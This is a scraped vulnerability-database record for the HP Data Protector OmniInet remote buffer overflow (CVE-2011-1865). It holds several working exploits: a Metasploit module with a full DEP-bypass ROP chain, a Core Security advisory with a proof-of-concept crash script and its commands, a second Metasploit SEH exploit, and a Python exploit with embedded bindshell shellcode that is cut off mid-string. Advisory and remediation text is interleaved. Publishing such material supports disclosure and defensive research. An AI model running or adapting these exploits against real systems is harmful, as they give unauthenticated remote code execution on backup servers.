'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ], \n[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182' ], \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\", \n'PrependEncoder' => \"\\x66\\x81\\xc4\\xb8\\x0b\\x61\\x9d\", #add sp, 0xb88; popad; popfd \n}, \n'DefaultOptions' => \n{ \n'ExitFunction' => \"process\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n#If 'Max' gets too long (ie. 10000 bytes), we can get a busted heap \n[ \n'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243 on XP SP3 or Win Server 2003', \n{ \n'Offset' => 2005, #For overwriting a RETN (6481 for SEH) \n'Ret' => 0x7C342629, #RETN - MSVCR71.dll \n'Max' => 5000, \n} \n], \n[ \n'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243 on Win Server 2008', \n{ \n'Offset' => 1993, #For overwriting a RETN (6481 for SEH) \n'Ret' => 0x7C342629, #RETN - MSVCR71.dll \n'Max' => 5000, \n} \n], \n], \n'Privileged' => false, \n'DisclosureDate' => \"Jun 29 2011\", \n'DefaultTarget' => 0)) \n \nregister_options([Opt::RPORT(5555)], self.class) \nend \n \ndef nop \nreturn make_nops(4).unpack(\"L\")[0].to_i \nend \n \ndef exploit \n \nconnect \n \n#mona.py tekniq \n#https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/ \nrop = [ \n#Initial setup \n0x7C342629, # SLIDE \n0x7C342629, # SLIDE \n0x7C342629, # SLIDE \n0x7C342629, # SLIDE \n#ROP begins here \n0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) \n0x7c37a140, # Make EAX readable \n0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll) \nnop, # EBP \n0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) \n0x7c37a140, # <- VirtualProtect() found in IAT \n0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll) \n0x7c346c0b, # Slide, so next gadget would write to correct stack location \n0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll) \nnop, # EDI (filler) \nnop, # will be patched at runtime (VP), then picked up into ESI \nnop, # EBX (filler) \n0x7c376402, # POP EBP # RETN (msvcr71.dll) \n0x7c345c30, # ptr to push esp # ret (from MSVCR71.dll) \n0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) \n0xfffff82f, # size 20001 bytes \n0x7c351e05, # NEG EAX # RETN (MSVCR71.dll) \n0x7c354901, # POP EBX # RETN (MSVCR71.dll) \n0xffffffff, # pop value into ebx \n0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll) \n0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll) \n0x7c34d201, # POP ECX # RETN (MSVCR71.dll) \n0x7c38b001, # RW pointer (lpOldProtect) (-> ecx) \n0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll) \n0x7c34b8d8, # ROP NOP (-> edi) \n0x7c344f87, # POP EDX # RETN (MSVCR71.dll) \n0xffffffc0, # value to negate, target value : 0x00000040, target: edx \n0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll) \n0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) \n0x90909090, # NOPS (-> eax) \n0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll) \n].pack('V*') \n \n#Overflowing path \"C:\\Program Files\\OmniBack\\bin\\\" \n#4807 bytes after target.ret, but we need to use less than that to avoid a busted heap \nsploit = '' \nsploit << rand_text_alpha(target['Offset']-sploit.length) \nsploit << [target.ret].pack('V*') \nsploit << rop \nsploit << payload.encoded \nsploit << rand_text_alpha(target['Max']-sploit.length) \n \npkt = '' \npkt << Rex::Text.to_unicode(\"\\x00\") \npkt << \"\\x41\\x41\" #Length field place holder \npkt << \"\\xff\\xfe\" \npkt << Rex::Text.to_unicode(\"\\x32\\x00\") \npkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 5) \npkt << Rex::Text.to_unicode(\"\\x20\") \npkt << Rex::Text.to_unicode(\"20\") #Opcode \npkt << \"\\x00\" \npkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 7) \npkt << Rex::Text.to_unicode(\"\\x20\\x00\") \npkt << sploit \npkt << Rex::Text.to_unicode(\"\\x00\") \npkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 16) \n \n#pkt length \npkt[2,2] = [pkt.length-5].pack('n') \n \nprint_status(\"Sending packet to #{datastore['RHOST']}...\") \nsock.put(pkt) \n \n#Data Protector lags before triggering the vuln code \n#Long delay seems necessary to ensure we get a shell back \nselect(nil,nil,nil,20) \n \nhandler \ndisconnect \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/102746/hp_omniinet_4.rb.txt"}, {"lastseen": "2016-12-05T22:19:29", "description": "", "published": "2011-06-30T00:00:00", "type": "packetstorm", "title": "Core Security Technologies Advisory 2011.0514", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865"], "modified": "2011-06-30T00:00:00", "id": "PACKETSTORM:102673", "href": "https://packetstormsecurity.com/files/102673/Core-Security-Technologies-Advisory-2011.0514.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nCore Security Technologies - Corelabs Advisory \nhttp://corelabs.coresecurity.com/ \n \nMultiple vulnerabilities in HP Data Protector \n \n \n1. *Advisory Information* \n \nTitle: Multiple vulnerabilities in HP Data Protector \nAdvisory ID: CORE-2011-0514 \nAdvisory URL: \nhttp://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities \nDate published: 2011-06-29 \nDate of last update: 2011-06-29 \nVendors contacted: HP \nRelease mode: Coordinated release \n \n \n2. *Vulnerability Information* \n \nClass: Remote stack overflow [CWE-120], Null pointer dereference \n[CWE-476], Improper input validation [CWE-20] \nImpact: Code execution \nRemotely Exploitable: Yes \nLocally Exploitable: No \nCVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515 \n \n \n3. *Vulnerability Description* \n \nHP Data Protector [1] is an automated backup and recovery software for \nsingle-server to enterprise environments. Multiple vulnerabilities have \nbeen found in HP Data Protector that could allow a remote attacker to \nexecute arbitrary code and lead to denial of service conditions. The \nvulnerabilities are triggered by sending a request to port 5555 of a \nhost running the \"data protector inet\" service, part of HP Data \nProtector. The request has several parameters, including an opcode. By \nsending requests with specially crafted parameters, the different bugs \ncan be triggered. \n \n \n4. *Vulnerable packages* \n \n. HP OpenView Storage Data Protector v6.20 (running on Windows). \n. HP OpenView Storage Data Protector v6.11 (running on Windows). \n. HP OpenView Storage Data Protector v6.10 (running on Windows). \n. HP OpenView Storage Data Protector v6.00 (running on Windows). \n. Previous versions may be affected, but were not tested. \n \n \n5. *Non-vulnerable packages* \n \n. No fixes are available at the time of publication. \n \n \n6. *Vendor Information, Solutions and Workarounds* \n \nHP has issued a security bulletin with document ID c02872182 [2] \navailable through HP Support Center at http://www.hp.com/go/HPSC. \n \nThe latest version of HP Data Protector is vulnerable to these issues. \nHP has provided the following procedure to mitigate these vulnerabilities: \n \n1. Upgrade to Data Protector A.06.20 or subsequent. \n2. Enable encrypted control communication services on cell server and \nall clients in cell. \n \nThe upgrade is available for download from \nhttp://hp.com/go/dataprotector then under 'Product Information' click on \n'Trials and Demos'. \n \n \n7. *Credits* \n \nThese vulnerabilities were discovered by Oren Isacson from Core Security \nTechnologies. Publication was coordinated by Carlos Sarraute. \n \n \n8. *Technical Description / Proof of Concept Code* \n \nThe following python script can be used to reproduce the different bugs. \n \n/----- \nimport struct, socket, sys \n \ntarget = sys.argv[1] \nopcode = sys.argv[2] \nstring_lenght = int(sys.argv[3]) \nargs_number = int(sys.argv[4]) \nlong_argument = int(sys.argv[5]) \n \ndef to_wc(x): \nreturn ''.join([\"%s\\x00\" % c for c in x] ) \n \nargs = [to_wc('a')] * args_number \nargs[5] = to_wc(opcode) \nargs[long_argument] = 'a' * string_lenght \npacket = [\"\\xff\\xfe\\x32\\x00\\x00\\x00\"] \n \nfor s in args: \npacket.append(\"\\x20\\x00\" + s + \"\\x00\\x00\") \n \npacket = ''.join(packet) \npacket = struct.pack(\">L\", len(packet)) + packet \n \nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) \nsock.connect((target, 5555)) \nsock.send(packet) \n \n- -----/ \n \n \nIn the following sections, we give the command line details to reproduce \neach bug, and a brief description of the effect produced. \n \n \n8.1. *Vulnerability 1. Opcodes 20 y 28.* \n \n[CVE-2011-1865] This vulnerability can be reproduced with any of the \nfollowing commands: \n\"poc.py 127.0.0.1 20 10000 30 13\" or \"poc.py 127.0.0.1 28 10000 30 6\" \nThis causes a stack overflow. \n \n/----- \n007ce194 00426c52 007d0000 00810b48 007ce266 omniinet+0x26bf3 \n007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52 \n007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35 \n61616161 00000000 00000000 00000000 00000000 0x61616161 \n \n- -----/ \n \n \n \n8.2. *Vulnerability 2. Opcode 11.* \n \n[CVE-2011-1865] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 11 10000 30 17\" \nA stack overflow is produced within the function swprintf, called from \nposition 0x00411A72. \n \n \n8.3. *Vulnerability 3. Opcode 35.* \n \n[CVE-2011-1865] This vulnerability can be reproduced with any of the \nfollowing commands: \n\"poc.py 127.0.0.1 35 10000 30 6\" or \"poc.py 127.0.0.1 35 10000 30 7\" \nA stack overflow is produced within the function swprintf, called from \nposition 0041367F. \n \n \n8.4. *Vulnerability 4. Opcode 42.* \n \n[CVE-2011-1865] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 42 10000 30 9\" \nA stack overflow is produced by calling the function swprintf from \nposition 0x0040A9BA. \n \n \n8.5. *Vulnerability 5. Opcode 46.* \n \n[CVE-2011-1865] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 46 10000 30 17\" \nA stack overflow is produced by calling the function swprintf from \nposition 0x0040A708. \n \n \n8.6. *Vulnerability 6. Opcode 27.* \n \n[CVE-2011-1865] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 27 10000 30 3\" \nA stack overflow is produced by calling the function swprintf from \nposition 0x0040AD53. \n \n \n8.7. *Vulnerabilidad 7. Opcode 17.* \n \n[CVE-2011-1865] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 17 10000 30 6\" \nA stack overflow is produced by calling the function swprintf from \nposition 0x0040FC05. \n \n \n8.8. *Vulnerability 8. Opcode 11.* \n \n[CVE-2011-1514] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 11 1 7 6\" \nThis causes a null pointer dereference. \n \n/----- \neax=00000014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490 \nedi=00000000 \neip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac \npe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 \nefl=00010212 \nomniinet+0x7ed0: \n00407ed0 8b10 mov edx,[eax] \nds:0023:00000014=???????? \n \n \n007cdd8c 0041143e 00000000 00000000 00156490 omniinet+0x7ed0 \n007cea3c 0040892b 00000001 0046b9f0 00000000 omniinet+0x1143e \n007cf4b8 00408f02 00000000 00000000 00156490 omniinet+0x892b \n007cf518 0040a42c 00000000 7ad5f7f9 00000000 omniinet+0x8f02 \n007cffa0 77df352b 00000001 00156498 0012e7f8 omniinet+0xa42c \n007cffb4 7c80b713 00156490 00000000 0012e7f8 \nADVAPI32!CryptVerifySignatureW+0x29 \n007cffec 00000000 77df3519 00156490 00000000 \nkernel32!GetModuleFileNameA+0x1b4 \n \n- -----/ \n \n \n8.9. *Vulnerability 9. Opcode 20.* \n \n[CVE-2011-1515] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 20 1 7 6\" \nThe process terminates without generating an exception, resulting in a \ndenial of service condition. \n \n \n9. *Report Timeline* \n \n. 2011-06-02: \nCore Security Technologies notifies HP Security Alert team of the \nvulnerabilities. Publication date is temporarily set to July 5th, 2011. \n \n. 2011-06-06: \nVendor acknowledges receipt. \n \n. 2011-06-06: \nCore sends technical details to the vendor. \n \n. 2011-06-06: \nVendor confirms that a new case was assigned within HP Software Security \nResponse Team (SSRT). \n \n. 2011-06-16: \nCore requests an update on this issue, in particular Core asks the \nvendor for a technical analysis of the bugs, a list of affected products \nand versions, and the vendor's plan for providing a fix (no reply \nreceived). \n \n. 2011-06-23: \nCore requests once more an update. \n \n. 2011-06-28: \nVendor communicates that a security bulletin will be issued on the same \nday (June 28). The vendor confirms the vulnerabilities, and recommends \nas mitigation to enable encrypted communications in the cell server and \nclient. \n \n. 2011-06-28: \nCore requests a link to the vendor's bulletin, and asks whether CVE ids \nhave been assigned. \n \n. 2011-06-28: \nVendor provides a link to the bulletin and CVE names for the \nvulnerabilities. \n \n. 2011-06-29: \nAdvisory CORE-2011-0514 is published. \n \n \n10. *References* \n \n[1] HP Data Protector http://hp.com/go/dataprotector \n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector, \nRemote Execution of Arbitrary Code \nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182 \n \n \n11. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers, \nproject information and shared software tools for public use at: \nhttp://corelabs.coresecurity.com. \n \n \n12. *About Core Security Technologies* \n \nCore Security Technologies enables organizations to get ahead of threats \nwith security test and measurement solutions that continuously identify \nand demonstrate real-world exposures to their most critical assets. Our \ncustomers can gain real visibility into their security standing, real \nvalidation of their security controls, and real metrics to more \neffectively secure their organizations. \n \nCore Security's software solutions build on over a decade of trusted \nresearch and leading-edge threat expertise from the company's Security \nConsulting Services, CoreLabs and Engineering groups. Core Security \nTechnologies can be reached at +1 (617) 399-6980 or on the Web at: \nhttp://www.coresecurity.com. \n \n \n13. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2011 Core Security \nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative \nCommons Attribution Non-Commercial Share-Alike 3.0 (United States) \nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \n \n \n14. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.9 (MingW32) \n \niEUEARECAAYFAk4LmqsACgkQyNibggitWa02bgCYyTgE3BmdxGGAOY4dNZqmekvo \nCwCfTapBtDaQT/LBrrVC7K4l8G5hnEo= \n=ozGY \n-----END PGP SIGNATURE----- \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/102673/CORE-2011-0514.txt"}], "saint": [{"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "description": "Added: 07/18/2011 \nCVE: [CVE-2011-1865](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1865>) \nBID: [48486](<http://www.securityfocus.com/bid/48486>) \nOSVDB: [73571](<http://www.osvdb.org/73571>) \n\n\n### Background\n\nHP Data Protector is a backup solution for enterprise and distributed environments. The Data Protector environment consists of a Cell Manager, backup agents, and backup device servers. The OmniInet process (`**omniinet.exe**`) is responsible for communication between systems in the cell as well as for starting other processes that are used for backup and restore operations. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending an overly long opcode 27 request to the OmniInet process. \n\n### Resolution\n\nUpgrade to Data Protector A.06.20 or newer and enable encrypted control communication services on the cell server and all clients in the cell, as described in HP Security Bulletin [HPSBMU02686 SSRT100541](<http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02872182>). \n\n### References\n\n<http://secunia.com/advisories/45100> \n\n\n### Limitations\n\nExploit works on HP OpenView Storage Data Protector 6.20. \n\n### Platforms\n\nWindows Server 2003 \nWindows XP \n \n\n", "edition": 1, "modified": "2011-07-18T00:00:00", "published": "2011-07-18T00:00:00", "id": "SAINT:BE1843E272D1C58DB8EE87EEE629BCF9", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_data_protector_opcode_27", "type": "saint", "title": "HP OpenView Storage Data Protector Opcode 27 Stack Buffer Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:41", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "description": "Added: 07/18/2011 \nCVE: [CVE-2011-1865](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1865>) \nBID: [48486](<http://www.securityfocus.com/bid/48486>) \nOSVDB: [73571](<http://www.osvdb.org/73571>) \n\n\n### Background\n\nHP Data Protector is a backup solution for enterprise and distributed environments. The Data Protector environment consists of a Cell Manager, backup agents, and backup device servers. The OmniInet process (`**omniinet.exe**`) is responsible for communication between systems in the cell as well as for starting other processes that are used for backup and restore operations. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending an overly long opcode 27 request to the OmniInet process. \n\n### Resolution\n\nUpgrade to Data Protector A.06.20 or newer and enable encrypted control communication services on the cell server and all clients in the cell, as described in HP Security Bulletin [HPSBMU02686 SSRT100541](<http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02872182>). \n\n### References\n\n<http://secunia.com/advisories/45100> \n\n\n### Limitations\n\nExploit works on HP OpenView Storage Data Protector 6.20. \n\n### Platforms\n\nWindows Server 2003 \nWindows XP \n \n\n", "edition": 4, "modified": "2011-07-18T00:00:00", "published": "2011-07-18T00:00:00", "id": "SAINT:C5838FC8C5DFFAC4C8B6A54D44AF1F95", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_data_protector_opcode_27", "title": "HP OpenView Storage Data Protector Opcode 27 Stack Buffer Overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "edition": 2, "description": "Added: 07/18/2011 \nCVE: [CVE-2011-1865](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1865>) \nBID: [48486](<http://www.securityfocus.com/bid/48486>) \nOSVDB: [73571](<http://www.osvdb.org/73571>) \n\n\n### Background\n\nHP Data Protector is a backup solution for enterprise and distributed environments. The Data Protector environment consists of a Cell Manager, backup agents, and backup device servers. The OmniInet process (`**omniinet.exe**`) is responsible for communication between systems in the cell as well as for starting other processes that are used for backup and restore operations. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending an overly long opcode 27 request to the OmniInet process. \n\n### Resolution\n\nUpgrade to Data Protector A.06.20 or newer and enable encrypted control communication services on the cell server and all clients in the cell, as described in HP Security Bulletin [HPSBMU02686 SSRT100541](<http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02872182>). \n\n### References\n\n<http://secunia.com/advisories/45100> \n\n\n### Limitations\n\nExploit works on HP OpenView Storage Data Protector 6.20. \n\n### Platforms\n\nWindows Server 2003 \nWindows XP \n \n\n", "modified": "2011-07-18T00:00:00", "published": "2011-07-18T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_data_protector_opcode_27", "id": "SAINT:58795E132074156A75A962B77A5E7B84", "title": "HP OpenView Storage Data Protector Opcode 27 Stack Buffer Overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T07:55:30", "description": "HP OmniInet.exe Opcode 27 Buffer Overflow. CVE-2011-1865. Remote exploit for windows platform", "published": "2011-07-01T00:00:00", "type": "exploitdb", "title": "HP OmniInet.exe - Opcode 27 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2011-07-01T00:00:00", "id": "EDB-ID:17467", "href": "https://www.exploit-db.com/exploits/17467/", "sourceData": "##\r\n# $Id: hp_omniinet_3.rb 13081 2011-07-01 22:26:12Z sinn3r $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP OmniInet.exe Opcode 27 Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in the Hewlett-Packard\r\n\t\t\t\tOmniInet NT Service. By sending a specially crafted opcode 27 packet,\r\n\t\t\t\ta remote attacker may be able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 13081 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2011-1865' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'seh',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 800,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t#POP/POP/RET from OmniBack\\bin\\MSVCR71.dll\r\n\t\t\t\t\t\t\t'Ret' => 0x7c35630d\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jun 29 2011'))\r\n\r\n\t\tregister_options([Opt::RPORT(5555)], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\r\n\t\tconnect\r\n\t\tsock.put(rand_text_alpha_upper(64))\r\n\t\tresp = sock.get_once(-1,5)\r\n\t\tdisconnect\r\n\r\n\t\tif (resp)\r\n\t\t\tresp = resp.unpack('v*').pack('C*')\r\n\t\t\tprint_status(\"Received response: \" + resp)\r\n\r\n\t\t\t# extract version\r\n\t\t\tif (resp =~ /HP Data Protector/)\r\n\t\t\t\tversion = resp.split[3]\r\n\t\t\telsif (resp =~ /HP OpenView Storage Data Protector/)\r\n\t\t\t\tversion = resp.split[5]\r\n\t\t\telsif (resp =~ /HP StorageWorks Application Recovery Manager/)\r\n\t\t\t\tversion = resp.split[5]\r\n\t\t\telse\r\n\t\t\t\treturn Exploit::CheckCode::Detected\r\n\t\t\tend\r\n\r\n\t\t\tversion = version.split('.')\r\n\t\t\tmajor = version[1].to_i\r\n\t\t\tminor = version[2].to_i\r\n\t\t\tif ((major < 6) or (major == 6 and minor < 11))\r\n\t\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\t\tend\r\n\r\n\t\t\tif ((major > 6) or (major == 6 and minor >= 11))\r\n\t\t\t\treturn Exploit::CheckCode::Safe\r\n\t\t\tend\r\n\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\ttrigger = rand_text_alpha_upper(10000)\r\n\t\ttrigger[4552, payload.encoded.length] = payload.encoded\r\n\t\ttrigger[5352, 8] = generate_seh_record(target.ret) \r\n\t\ttrigger[5360, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-788\").encode_string\r\n\r\n\t\topcode = \"27\"\r\n\r\n\t\tpacket = Rex::Text.to_unicode(\"\\x00\")\r\n\t\tpacket << \"\\x27\\xca\" #length\r\n\t\tpacket << \"\\xff\\xfe\\x32\"\r\n\t\tpacket << \"\\x00\\x00\\x00\"\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 3\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x20\")\r\n\t\tpacket << trigger\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x00\")\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\")\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x20\" + opcode + \"\\x00\")\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 24 \r\n\r\n\t\tprint_status(\"Trying #{target.name}...\")\r\n\t\tsock.put(packet)\r\n\t\t\r\n\t\tselect(nil,nil,nil,10)\r\n\t\thandler\r\n\t\tdisconnect\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17467/"}, {"lastseen": "2016-02-02T07:55:38", "description": "HP Data Protector 6.11 Remote Buffer Overflow DEP ROP. CVE-2011-1865. Remote exploit for windows platform", "published": "2011-07-02T00:00:00", "type": "exploitdb", "title": "HP Data Protector 6.11 - Remote Buffer Overflow + DEP Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2011-07-02T00:00:00", "id": "EDB-ID:17468", "href": "https://www.exploit-db.com/exploits/17468/", "sourceData": "#!/usr/bin/python\r\n# HP Data Protector 6.11 Remote Buffer Overflow\r\n# Tested on Windows 2003 R2 + DEP Enabled\r\n# Authors: muts & dookie\r\n# Reference: http://www.exploit-db.com/exploits/17458/\r\n# Reference: http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\r\n# http://www.offensive-security.com/0day/hp-dataprotector.py.txt\r\n\r\nimport struct, socket, sys\r\ntarget = sys.argv[1]\r\n\r\n# bindshell - port 4444\r\nshellcode = (\"\\xbf\\x83\\x75\\x7f\\xdd\\xdb\\xc8\\xd9\\x74\\x24\\xf4\\x5e\\x33\\xc9\\xb1\"\r\n\"\\x56\\x31\\x7e\\x13\\x03\\x7e\\x13\\x83\\xee\\x7f\\x97\\x8a\\x21\\x97\\xd1\"\r\n\"\\x75\\xda\\x67\\x82\\xfc\\x3f\\x56\\x90\\x9b\\x34\\xca\\x24\\xef\\x19\\xe6\"\r\n\"\\xcf\\xbd\\x89\\x7d\\xbd\\x69\\xbd\\x36\\x08\\x4c\\xf0\\xc7\\xbc\\x50\\x5e\"\r\n\"\\x0b\\xde\\x2c\\x9d\\x5f\\x00\\x0c\\x6e\\x92\\x41\\x49\\x93\\x5c\\x13\\x02\"\r\n\"\\xdf\\xce\\x84\\x27\\x9d\\xd2\\xa5\\xe7\\xa9\\x6a\\xde\\x82\\x6e\\x1e\\x54\"\r\n\"\\x8c\\xbe\\x8e\\xe3\\xc6\\x26\\xa5\\xac\\xf6\\x57\\x6a\\xaf\\xcb\\x1e\\x07\"\r\n\"\\x04\\xbf\\xa0\\xc1\\x54\\x40\\x93\\x2d\\x3a\\x7f\\x1b\\xa0\\x42\\x47\\x9c\"\r\n\"\\x5a\\x31\\xb3\\xde\\xe7\\x42\\x00\\x9c\\x33\\xc6\\x95\\x06\\xb0\\x70\\x7e\"\r\n\"\\xb6\\x15\\xe6\\xf5\\xb4\\xd2\\x6c\\x51\\xd9\\xe5\\xa1\\xe9\\xe5\\x6e\\x44\"\r\n\"\\x3e\\x6c\\x34\\x63\\x9a\\x34\\xef\\x0a\\xbb\\x90\\x5e\\x32\\xdb\\x7d\\x3f\"\r\n\"\\x96\\x97\\x6c\\x54\\xa0\\xf5\\xf8\\x99\\x9f\\x05\\xf9\\xb5\\xa8\\x76\\xcb\"\r\n\"\\x1a\\x03\\x11\\x67\\xd3\\x8d\\xe6\\x88\\xce\\x6a\\x78\\x77\\xf0\\x8a\\x50\"\r\n\"\\xbc\\xa4\\xda\\xca\\x15\\xc4\\xb0\\x0a\\x99\\x11\\x16\\x5b\\x35\\xc9\\xd7\"\r\n\"\\x0b\\xf5\\xb9\\xbf\\x41\\xfa\\xe6\\xa0\\x69\\xd0\\x91\\xe6\\xa7\\x00\\xf2\"\r\n\"\\x80\\xc5\\xb6\\xe5\\x0c\\x43\\x50\\x6f\\xbd\\x05\\xca\\x07\\x7f\\x72\\